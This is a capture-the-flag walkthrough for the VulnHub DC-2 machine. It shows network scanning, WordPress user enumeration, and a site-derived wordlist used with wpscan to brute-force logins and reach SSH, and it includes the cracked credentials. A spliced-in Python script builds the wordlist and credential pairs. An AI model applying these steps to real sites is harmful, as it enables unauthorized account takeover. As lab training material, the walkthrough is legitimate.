In this article we will gain root access to the machine DC-2, a CTF challenge aimed at beginners in this field. The machine can be downloaded from VulnHub.
Our first step is to identify the target on the local network, and for that we run the command: netdiscover -i wlan0
Now let's run nmap to check for open ports and service versions, and for that we run the command:
nmap -A 192.168.43.148
The result shows only one open port, 80 (HTTP). Because nmap only scans the 1000 most common ports by default, we confirm with a full port scan:
nmap -p- 192.168.43.148
This scan shows one more service, on port 7744, that the default scan missed.
So we browse the HTTP service by typing 192.168.43.148:80 into the web browser, but the page does not load (we get an error), so we edit our /etc/hosts file and add an entry mapping 192.168.43.148 to the hostname dc-2.
Now we try to open the website again, and this time it loads. We have a WordPress site, so the next step is WordPress enumeration. Read this article: https://www.haclabs.org/post/wordpress-penetration-testing to know more about WordPress enumeration.
Enumerating the WordPress site turns up no vulnerable theme and no vulnerable plugin that we can exploit, so we enumerate users with the command: ./wpscan --url http://dc-2 --enumerate u
We found three users: admin, jerry and tom. A brute-force attack against them with the wordlists in /usr/share/wordlists failed to find any password. Browsing the website again, we found a page named flag; clicking it gives us a hint.
So we decided to use the tool cewl, which comes preinstalled in Kali Linux. It spiders a given URL to the specified depth and returns the list of words found on the pages, which can be used as a password list for cracking. To generate the list we run the command: cewl http://dc-2 > passwords.txt
and we save the names of the users we found in a file named users.txt, one per line.
Now we use these two lists to find the passwords with the command:
./wpscan --url http://dc-2 -U users.txt -P passwords.txt
wpscan found two valid combinations:
Username: jerry, Password: adipiscing
Username: tom, Password: parturient
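What cewl does to build passwords.txt, and how wpscan then pairs users.txt with it, can be seen end to end in the following Python script. This is an added example, not cewl, wpscan or the original author's code: it runs against a constructed HTML sample embedded in the block (the real site's pages are not reproduced), keeps only the text a visitor would read (script, style and comment text are dropped), applies cewl's default minimum word length of 3, and pairs the result with the three usernames the way wpscan -U/-P does. The fetch_html helper, and the assumption that dc-2 resolves through the /etc/hosts entry, are mine; it is not called unless you point the script at a live target.

```python
import re
import urllib.request
from html.parser import HTMLParser

# Constructed sample standing in for a page of http://dc-2 (not the real
# site's HTML). It includes the things a naive scraper gets wrong: a title,
# script and style blocks, an HTML comment, an entity and punctuation.
SAMPLE_HTML = """<html><head><title>DC-2 &ndash; Just another WordPress site</title>
<script>var wp = {ajaxurl: "/wp-admin/admin-ajax.php"};</script>
<style>.hidden { display: none }</style></head>
<body><h1>Welcome to DC-2</h1>
<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vestibulum
parturient montes, nascetur ridiculus mus. It's a test: the-password!</p>
<!-- a comment the spider should ignore -->
<p>Flag 1: log into WordPress. cewl. Your usual wordlists probably won't work.</p>
</body></html>"""


class VisibleText(HTMLParser):
    """Collects the text a visitor would read: skips <script>/<style>
    bodies, drops comments (handle_comment is left as the no-op default)
    and decodes entities such as &ndash;."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.chunks = []
        self._hidden_depth = 0

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._hidden_depth += 1

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._hidden_depth:
            self._hidden_depth -= 1

    def handle_data(self, data):
        if not self._hidden_depth:
            self.chunks.append(data)


def extract_words(html, min_length=3, lowercase=True):
    """Return candidate words from one page, most frequent first (ties
    alphabetically). min_length=3 mirrors cewl's default -m 3; splitting
    on anything that is not a letter or digit is an approximation of
    cewl's tokenising, not a copy of it."""
    parser = VisibleText()
    parser.feed(html)
    parser.close()  # flush any buffered text
    text = " ".join(parser.chunks)
    if lowercase:
        text = text.lower()
    counts = {}
    for word in re.findall(r"[A-Za-z0-9]+", text):
        if len(word) >= min_length:
            counts[word] = counts.get(word, 0) + 1
    return sorted(counts, key=lambda w: (-counts[w], w))


def fetch_html(url, timeout=10):
    """Download one page. Assumes the hostname resolves (for dc-2, via the
    /etc/hosts entry). Not called below, so the script runs offline."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        charset = resp.headers.get_content_charset() or "utf-8"
        return resp.read().decode(charset, "replace")


def credential_pairs(users, passwords):
    """Every user/password combination: the set wpscan -U users.txt
    -P passwords.txt works through."""
    return [(user, pw) for user in users for pw in passwords]


def write_list(path, items):
    """Write one entry per line, the format wpscan -U/-P and cewl use."""
    with open(path, "w", encoding="utf-8") as fh:
        fh.write("\n".join(items) + "\n")


if __name__ == "__main__":
    words = extract_words(SAMPLE_HTML)
    users = ["admin", "jerry", "tom"]
    write_list("passwords.txt", words)
    write_list("users.txt", users)
    print(f"{len(words)} candidate words, "
          f"{len(credential_pairs(users, words))} login attempts to make")
```

Against the real target you would pass fetch_html("http://dc-2") to extract_words instead of the sample. Two differences from cewl are worth knowing: cewl follows links to the requested depth (-d), so it harvests words from every page it can reach rather than one, and its tokenising rules differ in detail, so the two lists will not be identical. The point of the dedicated hint on DC-2 is that both passwords come from the site's own text, which is why a generic wordlist fails and a site-derived one succeeds.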
To log into the WordPress admin panel we visit http://dc-2/wp-login.php; we logged in successfully with the credentials of user tom.
But we didn't find anything useful there, so we logged in as jerry.
Under Pages > All Pages we found two pages, flag and flag2.
The content of page flag is:
and the content of page flag2 is:
This hint tells us that port 7744, which we discovered earlier, is used for SSH, another way of getting into the system. We try the credentials of both users against SSH on port 7744 and succeed with the credentials of user tom.
When we run a couple of commands we get an error.